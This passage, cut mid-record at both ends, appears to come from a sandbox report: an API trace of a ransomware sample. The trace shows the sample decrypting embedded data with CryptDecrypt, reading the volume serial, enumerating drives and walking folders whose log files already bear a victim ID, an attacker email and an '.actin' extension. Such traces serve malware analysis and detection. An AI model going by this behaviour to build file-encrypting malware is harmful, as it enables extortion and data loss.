dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x423f9ac | out: phKey=0x423f9ac*=0x1327218) returned 1 [0134.571] CryptSetKeyParam (hKey=0x1327218, dwParam=0x1, pbData=0x423f994, dwFlags=0x0) returned 1 [0134.571] CryptDecrypt (in: hKey=0x1327218, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb0550, pdwDataLen=0x423f960 | out: pbData=0x2cb0550, pdwDataLen=0x423f960) returned 1 [0134.571] CryptDestroyKey (hKey=0x1327218) returned 1 [0134.571] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cb0578 [0134.571] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e) returned 0x2cbbf68 [0134.571] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb4880 [0134.571] CryptImportKey (in: hProv=0x12f68a8, pbData=0x423f91c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x423f984 | out: phKey=0x423f984*=0x1327358) returned 1 [0134.571] CryptSetKeyParam (hKey=0x1327358, dwParam=0x1, pbData=0x423f96c, dwFlags=0x0) returned 1 [0134.571] CryptDecrypt (in: hKey=0x1327358, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb4880, pdwDataLen=0x423f938 | out: pbData=0x2cb4880, pdwDataLen=0x423f938) returned 1 [0134.571] CryptDestroyKey (hKey=0x1327358) returned 1 [0134.571] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4880 | out: hHeap=0x2cb0000) returned 1 [0134.571] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2cb0578, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0134.571] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0134.571] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb0550 | out: hHeap=0x2cb0000) returned 1 [0134.571] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x423f9ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x423f9ec*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0134.571] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb0578 | out: hHeap=0x2cb0000) returned 1 [0134.571] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x40) returned 0x2cb0550 [0134.571] CryptImportKey (in: hProv=0x12f68a8, pbData=0x423f978, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x423f9e0 | out: phKey=0x423f9e0*=0x1326f58) returned 1 [0134.571] CryptSetKeyParam (hKey=0x1326f58, dwParam=0x1, pbData=0x423f9c8, dwFlags=0x0) returned 1 [0134.571] CryptDecrypt (in: hKey=0x1326f58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb0550, pdwDataLen=0x423f994 | out: pbData=0x2cb0550, pdwDataLen=0x423f994) returned 1 [0134.571] CryptDestroyKey (hKey=0x1326f58) returned 1 [0134.571] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x28) returned 0x2cbbf68 [0134.572] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x4dc [0134.572] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x4e0 [0134.572] GetLogicalDrives () returned 0x4 [0134.572] Sleep (dwMilliseconds=0x3e8) [0135.708] CloseHandle (hObject=0x4e0) returned 1 [0135.708] CloseHandle (hObject=0x4dc) returned 1 [0135.708] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0135.708] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb0550 | out: hHeap=0x2cb0000) returned 1 Thread: id = 80 os_tid = 0xf28 [0134.625] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x38) returned 0x2cbbf98 [0134.625] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x18) returned 0x2cb1408 [0134.625] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x4e4 [0134.625] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x4e8 [0134.625] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x4ec [0134.626] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10000) returned 0x4351668 [0134.626] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1, lpStartAddress=0x1153a08, lpParameter=0x457fbdc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4f0 [0134.626] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1, lpStartAddress=0x1153a08, lpParameter=0x457fbdc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4f4 [0134.627] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10000) returned 0x4361670 [0134.627] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x457f950 | out: lpFindFileData=0x457f950*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x457fb78, dwReserved1=0x0, cFileName="$GetCurrent", cAlternateFileName="$GETCU~1")) returned 0x1327498 [0134.628] GetLastError () returned 0x0 [0134.628] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x214) returned 0x4371678 [0134.628] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74440000 [0134.628] GetCurrentThreadId () returned 0xf28 [0134.628] SetLastError (dwErrCode=0x0) [0134.628] GetLastError () returned 0x0 [0134.628] SetLastError (dwErrCode=0x0) [0134.628] GetLastError () returned 0x0 [0134.628] SetLastError (dwErrCode=0x0) [0134.628] GetLastError () returned 0x0 [0134.629] SetLastError (dwErrCode=0x0) [0134.629] GetLastError () returned 0x0 [0134.629] SetLastError (dwErrCode=0x0) [0134.629] GetLastError () returned 0x0 [0134.629] SetLastError (dwErrCode=0x0) [0134.629] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10000) returned 0x4371898 [0134.629] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\*", lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName=".", cAlternateFileName="")) returned 0x1327358 [0134.631] FindNextFileW (in: hFindFile=0x1327358, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="..", cAlternateFileName="")) returned 1 [0134.631] FindNextFileW (in: hFindFile=0x1327358, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="Logs", cAlternateFileName="")) returned 1 [0134.631] GetLastError () returned 0x0 [0134.631] SetLastError (dwErrCode=0x0) [0134.631] GetLastError () returned 0x0 [0134.631] SetLastError (dwErrCode=0x0) [0134.631] GetLastError () returned 0x0 [0134.631] SetLastError (dwErrCode=0x0) [0134.631] GetLastError () returned 0x0 [0134.631] SetLastError (dwErrCode=0x0) [0134.631] GetLastError () returned 0x0 [0134.632] SetLastError (dwErrCode=0x0) [0134.632] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10000) returned 0x43818a0 [0134.632] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\*", lpFindFileData=0x457f448 | out: lpFindFileData=0x457f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x756, cFileName=".", cAlternateFileName="")) returned 0x1327398 [0134.635] FindNextFileW (in: hFindFile=0x1327398, lpFindFileData=0x457f448 | out: lpFindFileData=0x457f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x756, cFileName="..", cAlternateFileName="")) returned 1 [0134.635] FindNextFileW (in: hFindFile=0x1327398, lpFindFileData=0x457f448 | out: lpFindFileData=0x457f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c30e245, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c30e245, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c334508, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xa7e2, dwReserved0=0x0, dwReserved1=0x756, cFileName="downlevel_2017_09_07_02_02_39_766.log.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="DOWNLE~1.ACT")) returned 1 [0134.635] GetLastError () returned 0x0 [0134.635] SetLastError (dwErrCode=0x0) [0134.635] GetLastError () returned 0x0 [0134.635] SetLastError (dwErrCode=0x0) [0134.635] GetLastError () returned 0x0 [0134.635] SetLastError (dwErrCode=0x0) [0134.635] GetLastError () returned 0x0 [0134.635] SetLastError (dwErrCode=0x0) [0134.635] GetLastError () returned 0x0 [0134.635] SetLastError (dwErrCode=0x0) [0134.635] GetLastError () returned 0x0 [0134.636] SetLastError (dwErrCode=0x0) [0134.636] GetLastError () returned 0x0 [0134.636] SetLastError (dwErrCode=0x0) [0134.636] GetLastError () returned 0x0 [0134.636] SetLastError (dwErrCode=0x0) [0134.636] GetLastError () returned 0x0 [0134.636] SetLastError (dwErrCode=0x0) [0134.636] GetLastError () returned 0x0 [0134.636] SetLastError (dwErrCode=0x0) [0134.636] GetLastError () returned 0x0 [0134.636] SetLastError (dwErrCode=0x0) [0134.636] GetLastError () returned 0x0 [0134.636] SetLastError (dwErrCode=0x0) [0134.636] GetLastError () returned 0x0 [0134.636] SetLastError (dwErrCode=0x0) [0134.636] GetLastError () returned 0x0 [0134.636] SetLastError (dwErrCode=0x0) [0134.636] GetLastError () returned 0x0 [0134.636] SetLastError (dwErrCode=0x0) [0134.636] GetLastError () returned 0x0 [0134.636] SetLastError (dwErrCode=0x0) [0134.636] GetLastError () returned 0x0 [0134.637] SetLastError (dwErrCode=0x0) [0134.637] GetLastError () returned 0x0 [0134.637] SetLastError (dwErrCode=0x0) [0134.637] GetLastError () returned 0x0 [0134.637] SetLastError (dwErrCode=0x0) [0134.637] GetLastError () returned 0x0 [0134.637] SetLastError (dwErrCode=0x0) [0134.637] GetLastError () returned 0x0 [0134.637] SetLastError (dwErrCode=0x0) [0134.637] GetLastError () returned 0x0 [0134.637] SetLastError (dwErrCode=0x0) [0134.637] GetLastError () returned 0x0 [0134.637] SetLastError (dwErrCode=0x0) [0134.637] GetLastError () returned 0x0 [0134.637] SetLastError (dwErrCode=0x0) [0134.637] GetLastError () returned 0x0 [0134.637] SetLastError (dwErrCode=0x0) [0134.637] GetLastError () returned 0x0 [0134.637] SetLastError (dwErrCode=0x0) [0134.637] GetLastError () returned 0x0 [0134.637] SetLastError (dwErrCode=0x0) [0134.637] GetLastError () returned 0x0 [0134.637] SetLastError (dwErrCode=0x0) [0134.637] GetLastError () returned 0x0 [0134.638] SetLastError (dwErrCode=0x0) [0134.638] GetLastError () returned 0x0 [0134.638] SetLastError (dwErrCode=0x0) [0134.638] GetLastError () returned 0x0 [0134.638] SetLastError (dwErrCode=0x0) [0134.638] GetLastError () returned 0x0 [0134.638] SetLastError (dwErrCode=0x0) [0134.638] GetLastError () returned 0x0 [0134.638] SetLastError (dwErrCode=0x0) [0134.638] GetLastError () returned 0x0 [0134.638] SetLastError (dwErrCode=0x0) [0134.638] GetLastError () returned 0x0 [0134.638] SetLastError (dwErrCode=0x0) [0134.638] GetLastError () returned 0x0 [0134.638] SetLastError (dwErrCode=0x0) [0134.638] GetLastError () returned 0x0 [0134.638] SetLastError (dwErrCode=0x0) [0134.638] GetLastError () returned 0x0 [0134.638] SetLastError (dwErrCode=0x0) [0134.638] GetLastError () returned 0x0 [0134.638] SetLastError (dwErrCode=0x0) [0134.638] GetLastError () returned 0x0 [0134.638] SetLastError (dwErrCode=0x0) [0134.638] GetLastError () returned 0x0 [0134.638] SetLastError (dwErrCode=0x0) [0134.639] GetLastError () returned 0x0 [0134.639] SetLastError (dwErrCode=0x0) [0134.639] GetLastError () returned 0x0 [0134.639] SetLastError (dwErrCode=0x0) [0134.639] GetLastError () returned 0x0 [0134.639] SetLastError (dwErrCode=0x0) [0134.639] GetLastError () returned 0x0 [0134.639] SetLastError (dwErrCode=0x0) [0134.639] GetLastError () returned 0x0 [0134.639] SetLastError (dwErrCode=0x0) [0134.639] GetLastError () returned 0x0 [0134.639] SetLastError (dwErrCode=0x0) [0134.639] GetLastError () returned 0x0 [0134.639] SetLastError (dwErrCode=0x0) [0134.639] GetLastError () returned 0x0 [0134.639] SetLastError (dwErrCode=0x0) [0134.639] GetLastError () returned 0x0 [0134.639] SetLastError (dwErrCode=0x0) [0134.639] GetLastError () returned 0x0 [0134.639] SetLastError (dwErrCode=0x0) [0134.639] GetLastError () returned 0x0 [0134.640] SetLastError (dwErrCode=0x0) [0134.640] GetLastError () returned 0x0 [0134.640] SetLastError (dwErrCode=0x0) [0134.640] FindNextFileW (in: hFindFile=0x1327398, lpFindFileData=0x457f448 | out: lpFindFileData=0x457f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c334508, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c334508, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c334508, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x18a2, dwReserved0=0x0, dwReserved1=0x756, cFileName="oobe_2017_09_07_03_08_57_737.log.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="OOBE_2~1.ACT")) returned 1 [0134.640] GetLastError () returned 0x0 [0134.640] SetLastError (dwErrCode=0x0) [0134.640] GetLastError () returned 0x0 [0134.640] SetLastError (dwErrCode=0x0) [0134.640] GetLastError () returned 0x0 [0134.640] SetLastError (dwErrCode=0x0) [0134.640] GetLastError () returned 0x0 [0134.640] SetLastError (dwErrCode=0x0) [0134.640] GetLastError () returned 0x0 [0134.640] SetLastError (dwErrCode=0x0) [0134.640] GetLastError () returned 0x0 [0134.640] SetLastError (dwErrCode=0x0) [0134.640] GetLastError () returned 0x0 [0134.640] SetLastError (dwErrCode=0x0) [0134.640] GetLastError () returned 0x0 [0134.641] SetLastError (dwErrCode=0x0) [0134.641] GetLastError () returned 0x0 [0134.641] SetLastError (dwErrCode=0x0) [0134.641] GetLastError () returned 0x0 [0134.641] SetLastError (dwErrCode=0x0) [0134.641] GetLastError () returned 0x0 [0134.641] SetLastError (dwErrCode=0x0) [0134.641] GetLastError () returned 0x0 [0134.641] SetLastError (dwErrCode=0x0) [0134.641] GetLastError () returned 0x0 [0134.641] SetLastError (dwErrCode=0x0) [0134.641] GetLastError () returned 0x0 [0134.641] SetLastError (dwErrCode=0x0) [0134.641] GetLastError () returned 0x0 [0134.641] SetLastError (dwErrCode=0x0) [0134.641] GetLastError () returned 0x0 [0134.641] SetLastError (dwErrCode=0x0) [0134.641] GetLastError () returned 0x0 [0134.641] SetLastError (dwErrCode=0x0) [0134.641] GetLastError () returned 0x0 [0134.641] SetLastError (dwErrCode=0x0) [0134.641] GetLastError () returned 0x0 [0134.641] SetLastError (dwErrCode=0x0) [0134.641] GetLastError () returned 0x0 [0134.642] SetLastError (dwErrCode=0x0) [0134.642] GetLastError () returned 0x0 [0134.642] SetLastError (dwErrCode=0x0) [0134.642] GetLastError () returned 0x0 [0134.642] SetLastError (dwErrCode=0x0) [0134.642] GetLastError () returned 0x0 [0134.642] SetLastError (dwErrCode=0x0) [0134.642] GetLastError () returned 0x0 [0134.642] SetLastError (dwErrCode=0x0) [0134.642] GetLastError () returned 0x0 [0134.642] SetLastError (dwErrCode=0x0) [0134.642] GetLastError () returned 0x0 [0134.642] SetLastError (dwErrCode=0x0) [0134.642] GetLastError () returned 0x0 [0134.642] SetLastError (dwErrCode=0x0) [0134.642] GetLastError () returned 0x0 [0134.642] SetLastError (dwErrCode=0x0) [0134.642] GetLastError () returned 0x0 [0134.642] SetLastError (dwErrCode=0x0) [0134.642] GetLastError () returned 0x0 [0134.642] SetLastError (dwErrCode=0x0) [0134.642] GetLastError () returned 0x0 [0134.642] SetLastError (dwErrCode=0x0) [0134.642] GetLastError () returned 0x0 [0134.642] SetLastError (dwErrCode=0x0) [0134.643] GetLastError () returned 0x0 [0134.643] SetLastError (dwErrCode=0x0) [0134.643] GetLastError () returned 0x0 [0134.643] SetLastError (dwErrCode=0x0) [0134.643] GetLastError () returned 0x0 [0134.643] SetLastError (dwErrCode=0x0) [0134.643] GetLastError () returned 0x0 [0134.643] SetLastError (dwErrCode=0x0) [0134.643] GetLastError () returned 0x0 [0134.643] SetLastError (dwErrCode=0x0) [0134.643] GetLastError () returned 0x0 [0134.643] SetLastError (dwErrCode=0x0) [0134.643] GetLastError () returned 0x0 [0134.643] SetLastError (dwErrCode=0x0) [0134.643] GetLastError () returned 0x0 [0134.643] SetLastError (dwErrCode=0x0) [0134.643] GetLastError () returned 0x0 [0134.643] SetLastError (dwErrCode=0x0) [0134.643] GetLastError () returned 0x0 [0134.643] SetLastError (dwErrCode=0x0) [0134.643] GetLastError () returned 0x0 [0134.643] SetLastError (dwErrCode=0x0) [0134.643] GetLastError () returned 0x0 [0134.643] SetLastError (dwErrCode=0x0) [0134.643] GetLastError () returned 0x0 [0134.644] SetLastError (dwErrCode=0x0) [0134.644] GetLastError () returned 0x0 [0134.644] SetLastError (dwErrCode=0x0) [0134.644] GetLastError () returned 0x0 [0134.644] SetLastError (dwErrCode=0x0) [0134.644] GetLastError () returned 0x0 [0134.644] SetLastError (dwErrCode=0x0) [0134.644] GetLastError () returned 0x0 [0134.644] SetLastError (dwErrCode=0x0) [0134.644] GetLastError () returned 0x0 [0134.644] SetLastError (dwErrCode=0x0) [0134.644] GetLastError () returned 0x0 [0134.644] SetLastError (dwErrCode=0x0) [0134.644] GetLastError () returned 0x0 [0134.644] SetLastError (dwErrCode=0x0) [0134.644] GetLastError () returned 0x0 [0134.644] SetLastError (dwErrCode=0x0) [0134.644] FindNextFileW (in: hFindFile=0x1327398, lpFindFileData=0x457f448 | out: lpFindFileData=0x457f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c6a1810, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c6a1810, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c7d2e4e, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x142, dwReserved0=0x0, dwReserved1=0x756, cFileName="PartnerSetupCompleteResult.log.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="PARTNE~1.ACT")) returned 1 [0134.644] GetLastError () returned 0x0 [0134.644] SetLastError (dwErrCode=0x0) [0134.644] GetLastError () returned 0x0 [0134.644] SetLastError (dwErrCode=0x0) [0134.644] GetLastError () returned 0x0 [0134.645] SetLastError (dwErrCode=0x0) [0134.645] GetLastError () returned 0x0 [0134.645] SetLastError (dwErrCode=0x0) [0134.645] GetLastError () returned 0x0 [0134.645] SetLastError (dwErrCode=0x0) [0134.645] GetLastError () returned 0x0 [0134.645] SetLastError (dwErrCode=0x0) [0134.645] GetLastError () returned 0x0 [0134.645] SetLastError (dwErrCode=0x0) [0134.645] GetLastError () returned 0x0 [0134.645] SetLastError (dwErrCode=0x0) [0134.645] GetLastError () returned 0x0 [0134.645] SetLastError (dwErrCode=0x0) [0134.645] GetLastError () returned 0x0 [0134.645] SetLastError (dwErrCode=0x0) [0134.645] GetLastError () returned 0x0 [0134.645] SetLastError (dwErrCode=0x0) [0134.645] GetLastError () returned 0x0 [0134.645] SetLastError (dwErrCode=0x0) [0134.645] GetLastError () returned 0x0 [0134.645] SetLastError (dwErrCode=0x0) [0134.645] GetLastError () returned 0x0 [0134.645] SetLastError (dwErrCode=0x0) [0134.645] GetLastError () returned 0x0 [0134.645] SetLastError (dwErrCode=0x0) [0134.645] GetLastError () returned 0x0 [0134.646] SetLastError (dwErrCode=0x0) [0134.646] GetLastError () returned 0x0 [0134.646] SetLastError (dwErrCode=0x0) [0134.646] GetLastError () returned 0x0 [0134.646] SetLastError (dwErrCode=0x0) [0134.646] GetLastError () returned 0x0 [0134.646] SetLastError (dwErrCode=0x0) [0134.646] GetLastError () returned 0x0 [0134.646] SetLastError (dwErrCode=0x0) [0134.646] GetLastError () returned 0x0 [0134.646] SetLastError (dwErrCode=0x0) [0134.646] GetLastError () returned 0x0 [0134.646] SetLastError (dwErrCode=0x0) [0134.646] GetLastError () returned 0x0 [0134.646] SetLastError (dwErrCode=0x0) [0134.646] GetLastError () returned 0x0 [0134.646] SetLastError (dwErrCode=0x0) [0134.646] GetLastError () returned 0x0 [0134.646] SetLastError (dwErrCode=0x0) [0134.646] GetLastError () returned 0x0 [0134.646] SetLastError (dwErrCode=0x0) [0134.646] GetLastError () returned 0x0 [0134.646] SetLastError (dwErrCode=0x0) [0134.646] GetLastError () returned 0x0 [0134.647] SetLastError (dwErrCode=0x0) [0134.647] GetLastError () returned 0x0 [0134.647] SetLastError (dwErrCode=0x0) [0134.647] GetLastError () returned 0x0 [0134.647] SetLastError (dwErrCode=0x0) [0134.647] GetLastError () returned 0x0 [0134.647] SetLastError (dwErrCode=0x0) [0134.647] GetLastError () returned 0x0 [0134.647] SetLastError (dwErrCode=0x0) [0134.647] GetLastError () returned 0x0 [0134.647] SetLastError (dwErrCode=0x0) [0134.647] GetLastError () returned 0x0 [0134.647] SetLastError (dwErrCode=0x0) [0134.647] GetLastError () returned 0x0 [0134.647] SetLastError (dwErrCode=0x0) [0134.647] GetLastError () returned 0x0 [0134.647] SetLastError (dwErrCode=0x0) [0134.647] GetLastError () returned 0x0 [0134.647] SetLastError (dwErrCode=0x0) [0134.647] GetLastError () returned 0x0 [0134.647] SetLastError (dwErrCode=0x0) [0134.647] GetLastError () returned 0x0 [0134.647] SetLastError (dwErrCode=0x0) [0134.647] GetLastError () returned 0x0 [0134.648] SetLastError (dwErrCode=0x0) [0134.648] GetLastError () returned 0x0 [0134.648] SetLastError (dwErrCode=0x0) [0134.648] GetLastError () returned 0x0 [0134.648] SetLastError (dwErrCode=0x0) [0134.648] GetLastError () returned 0x0 [0134.648] SetLastError (dwErrCode=0x0) [0134.648] GetLastError () returned 0x0 [0134.648] SetLastError (dwErrCode=0x0) [0134.648] GetLastError () returned 0x0 [0134.648] SetLastError (dwErrCode=0x0) [0134.648] GetLastError () returned 0x0 [0134.648] SetLastError (dwErrCode=0x0) [0134.648] GetLastError () returned 0x0 [0134.648] SetLastError (dwErrCode=0x0) [0134.648] GetLastError () returned 0x0 [0134.648] SetLastError (dwErrCode=0x0) [0134.648] GetLastError () returned 0x0 [0134.648] SetLastError (dwErrCode=0x0) [0134.648] GetLastError () returned 0x0 [0134.648] SetLastError (dwErrCode=0x0) [0134.648] GetLastError () returned 0x0 [0134.648] SetLastError (dwErrCode=0x0) [0134.648] GetLastError () returned 0x0 [0134.649] SetLastError (dwErrCode=0x0) [0134.649] GetLastError () returned 0x0 [0134.649] SetLastError (dwErrCode=0x0) [0134.649] FindNextFileW (in: hFindFile=0x1327398, lpFindFileData=0x457f448 | out: lpFindFileData=0x457f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c6a1810, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c6a1810, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c7d2e4e, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x142, dwReserved0=0x0, dwReserved1=0x756, cFileName="PartnerSetupCompleteResult.log.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="PARTNE~1.ACT")) returned 0 [0134.649] FindClose (in: hFindFile=0x1327398 | out: hFindFile=0x1327398) returned 1 [0134.649] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43818a0 | out: hHeap=0x2cb0000) returned 1 [0134.649] FindNextFileW (in: hFindFile=0x1327358, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0134.650] GetLastError () returned 0x12 [0134.650] SetLastError (dwErrCode=0x12) [0134.650] GetLastError () returned 0x12 [0134.650] SetLastError (dwErrCode=0x12) [0134.650] GetLastError () returned 0x12 [0134.650] SetLastError (dwErrCode=0x12) [0134.650] GetLastError () returned 0x12 [0134.650] SetLastError (dwErrCode=0x12) [0134.650] GetLastError () returned 0x12 [0134.650] SetLastError (dwErrCode=0x12) [0134.650] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10000) returned 0x43818a0 [0134.650] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\*", lpFindFileData=0x457f448 | out: lpFindFileData=0x457f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x756, cFileName=".", cAlternateFileName="")) returned 0x1326f58 [0134.652] FindNextFileW (in: hFindFile=0x1326f58, lpFindFileData=0x457f448 | out: lpFindFileData=0x457f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x756, cFileName="..", cAlternateFileName="")) returned 1 [0134.652] FindNextFileW (in: hFindFile=0x1326f58, lpFindFileData=0x457f448 | out: lpFindFileData=0x457f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c4654a7, 